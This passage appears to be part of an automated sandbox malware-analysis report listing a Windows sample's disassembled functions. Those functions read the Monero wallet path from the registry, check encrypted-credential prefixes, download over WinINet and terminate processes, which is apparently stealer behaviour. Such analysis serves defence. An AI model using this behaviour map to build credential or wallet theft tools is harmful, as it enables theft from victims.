                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                              • String ID: Password
                              • API String ID: 356768136-3434357891
                              • Opcode ID: c9931c2140f1005326cf7f2ea10a14c431174fb0b0f7d38896fc96dc128ffd86
                              • Instruction ID: 6b3b2c36d10ae1148d039ed0b6e8b0e0068543bdd2da8da32f5b5a6832c7964c
                              • Opcode Fuzzy Hash: c9931c2140f1005326cf7f2ea10a14c431174fb0b0f7d38896fc96dc128ffd86
                              • Instruction Fuzzy Hash: 12713FB1D0421DEBDB14DF95CCC4ADEB7B9EF48300F10856AE509A7240EB35AE85CB91
                              Function 007B1120 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 37registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 007B1135
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007B113C
                              • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 007B1159
                              • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 007B1173
                              • RegCloseKey.ADVAPI32(?), ref: 007B117D
                              Strings
                              • SOFTWARE\monero-project\monero-core, xrefs: 007B114F
                              • wallet_path, xrefs: 007B116D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                              • API String ID: 3225020163-4244082812
                              • Opcode ID: a8ed309871bcd8e095f1522ff61db43e918b490bff1e39aa4952a5a74f6330cf
                              • Instruction ID: de57bf5ae935215b23061c64b9979245a29b40b00e6f0be52429d9b0478f4128
                              • Opcode Fuzzy Hash: a8ed309871bcd8e095f1522ff61db43e918b490bff1e39aa4952a5a74f6330cf
                              • Instruction Fuzzy Hash: 6BF096B5640348BBD7109BE19C8EFEB7B7CEB04716F400054FE05E6280D6705D4497A0
                              Function 007B9DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                              Download Yara Rule
                              APIs
                              • memcmp.MSVCRT(?,v20,00000003), ref: 007B9E04
                              • memcmp.MSVCRT(?,v10,00000003), ref: 007B9E42
                              • LocalAlloc.KERNEL32(00000040), ref: 007B9EA7
                                • Part of subcall function 007D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007D71FE
                              • lstrcpy.KERNEL32(00000000,007E4C48), ref: 007B9FB2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpymemcmp$AllocLocal
                              • String ID: @$v10$v20
                              • API String ID: 102826412-278772428
                              • Opcode ID: f877e1337748aab15e0be12ca0f150b133fc14fa25d7a7bed822a7e087d60d80
                              • Instruction ID: dfab5438aadce35d352b714cc4fdc20330f786282eda3dc504f7207cfb9be629
                              • Opcode Fuzzy Hash: f877e1337748aab15e0be12ca0f150b133fc14fa25d7a7bed822a7e087d60d80
                              • Instruction Fuzzy Hash: 9851BD71A11249EBDB10EF64DC89BEE77B4AF44324F154025FE19EB252DA78ED018B90
                              Function 007B5640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 007B565A
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007B5661
                              • InternetOpenA.WININET(007DCFEC,00000000,00000000,00000000,00000000), ref: 007B5677
                              • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 007B5692
                              • InternetReadFile.WININET(?,?,00000400,00000001), ref: 007B56BC
                              • memcpy.MSVCRT(00000000,?,00000001), ref: 007B56E1
                              • InternetCloseHandle.WININET(?), ref: 007B56FA
                              • InternetCloseHandle.WININET(00000000), ref: 007B5701
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                              • String ID:
                              • API String ID: 1008454911-0
                              • Opcode ID: 65cc75da61349bb401c4fcae62d3ad9d4a104329c1ea45d87fcfb269d2b3726a
                              • Instruction ID: 255dc7d0fd23a04eca30bcfdb7709044c2363521c171765bfc65095c2037b870
                              • Opcode Fuzzy Hash: 65cc75da61349bb401c4fcae62d3ad9d4a104329c1ea45d87fcfb269d2b3726a
                              • Instruction Fuzzy Hash: 6C419F70A00205EFDB24CF94DD88FEAB7B4FF48715F1480A9E9089B291E7759D42CB94
                              Function 007D4740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 007D4759
                              • Process32First.KERNEL32(00000000,00000128), ref: 007D4769
                              • Process32Next.KERNEL32(00000000,00000128), ref: 007D477B
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007D479C
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 007D47AB
                              • CloseHandle.KERNEL32(00000000), ref: 007D47B2
                              • Process32Next.KERNEL32(00000000,00000128), ref: 007D47C0
                              • CloseHandle.KERNEL32(00000000), ref: 007D47CB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 3836391474-0
                              • Opcode ID: dbe6e569a29f3809d4e4ff0f87338bf767b6cb2d6abe9c9fca34c837e115df53
                              • Instruction ID: de72cb5e1843a39c5e71d2c886aa45af5504754e1a6fe1d7d0bbd2b45743bea5
                              • Opcode Fuzzy Hash: dbe6e569a29f3809d4e4ff0f87338bf767b6cb2d6abe9c9fca34c837e115df53
                              • Instruction Fuzzy Hash: BC01B571615214ABE7209B70DCC9FEA77BCEB48762F000581F909E9281EF748D809AA0
                              Function 007C83E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 007C8435
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C846C
                              • lstrlen.KERNEL32(00000000), ref: 007C84B2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C84E9
                              • lstrlen.KERNEL32(00000000), ref: 007C84FF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C852E
                              • StrCmpCA.SHLWAPI(00000000,007E4C3C), ref: 007C853E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 7ddda848f57ce416d230258f7c4ea7883d79f35705bc909fdaf35a2c200a71ce
                              • Instruction ID: 508d08767e189a80fa445259c23f1546f7380196a0a82b030250843d2070749e
                              • Opcode Fuzzy Hash: 7ddda848f57ce416d230258f7c4ea7883d79f35705bc909fdaf35a2c200a71ce
                              • Instruction Fuzzy Hash: F5515C715002029FCB64DF68D888F9AB7B9EF44300B25845DEC45EB245EB78E9418B51
                              Function 007D2910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 007D2925
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D292C
                              • RegOpenKeyExA.ADVAPI32(80000002,0144BD58,00000000,00020119,007D28A9), ref: 007D294B
                              • RegQueryValueExA.ADVAPI32(007D28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 007D2965
                              • RegCloseKey.ADVAPI32(007D28A9), ref: 007D296F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: e261f4c2b5bd08a512678b2ea9232916b29f0d5e94b38cce18fe941502f669fd
                              • Instruction ID: 71f2f6ebc137b71d791b8607f0f4e93b46c19e4d3d58e2b330e4339485e0b38c
                              • Opcode Fuzzy Hash: e261f4c2b5bd08a512678b2ea9232916b29f0d5e94b38cce18fe941502f669fd
                              • Instruction Fuzzy Hash: 3E01B175604258ABD320CBA49C99FFB7BBCEB48716F100059FE49AB241EA315D058790
                              Function 007D2880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 007D2895
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D289C
                                • Part of subcall function 007D2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 007D2925
                                • Part of subcall function 007D2910: RtlAllocateHeap.NTDLL(00000000), ref: 007D292C
                                • Part of subcall function 007D2910: RegOpenKeyExA.ADVAPI32(80000002,0144BD58,00000000,00020119,007D28A9), ref: 007D294B
                                • Part of subcall function 007D2910: RegQueryValueExA.ADVAPI32(007D28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 007D2965
                                • Part of subcall function 007D2910: RegCloseKey.ADVAPI32(007D28A9), ref: 007D296F
                              • RegOpenKeyExA.ADVAPI32(80000002,0144BD58,00000000,00020119,007C9500), ref: 007D28D1
                              • RegQueryValueExA.ADVAPI32(007C9500,0145DA50,00000000,00000000,00000000,000000FF), ref: 007D28EC
                              • RegCloseKey.ADVAPI32(007C9500), ref: 007D28F6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 14767d02a9b16a5b8ecdedf96f711f62a142012751b2bea692ef99394d19a2b0
                              • Instruction ID: de5ba905acb2b69ff119e586611a229fc6e4fea5bc0c4369bd82b2f7438be17e
                              • Opcode Fuzzy Hash: 14767d02a9b16a5b8ecdedf96f711f62a142012751b2bea692ef99394d19a2b0
                              • Instruction Fuzzy Hash: AA018F71614248BBD710DBA4AC8DFAB777CEB44316F000555FE08DA291DA749D45A7A0
                              Function 007B71F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNEL32(?), ref: 007B723E
                              • GetProcessHeap.KERNEL32(00000008,00000010), ref: 007B7279
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007B7280
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 007B72C3
                              • HeapFree.KERNEL32(00000000), ref: 007B72CA
                              • GetProcAddress.KERNEL32(00000000,?), ref: 007B7329
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                              • String ID:
                              • API String ID: 174687898-0
                              • Opcode ID: da5d068243e269d64b29aa0d8a81a1b027e1cce30ea6736c5bbf964e60d427ca
                              • Instruction ID: 22964c6b3ad31a17d6a657fc64ea881bf86ffa81969ba91fbe52d10521e9d3e7
                              • Opcode Fuzzy Hash: da5d068243e269d64b29aa0d8a81a1b027e1cce30ea6736c5bbf964e60d427ca
                              • Instruction Fuzzy Hash: 59414A71A056469BDB24CFA9DC84BEAB3F8FB89315F1445A9EC49CB340E635ED00DB50
                              Function 007CD7B0 Relevance: 9.1, APIs: 6, Instructions: 127registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 007CD7D6
                              • RegOpenKeyExA.ADVAPI32(80000001,0145D360,00000000,00020119,?), ref: 007CD7F5
                              • RegQueryValueExA.ADVAPI32(?,0145DD20,00000000,00000000,00000000,000000FF), ref: 007CD819
                              • RegCloseKey.ADVAPI32(?), ref: 007CD823
                              • lstrcat.KERNEL32(?,00000000), ref: 007CD848
                              • lstrcat.KERNEL32(?,0145DC30), ref: 007CD85C
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$CloseOpenQueryValuememset
                              • String ID:
                              • API String ID: 2623679115-0
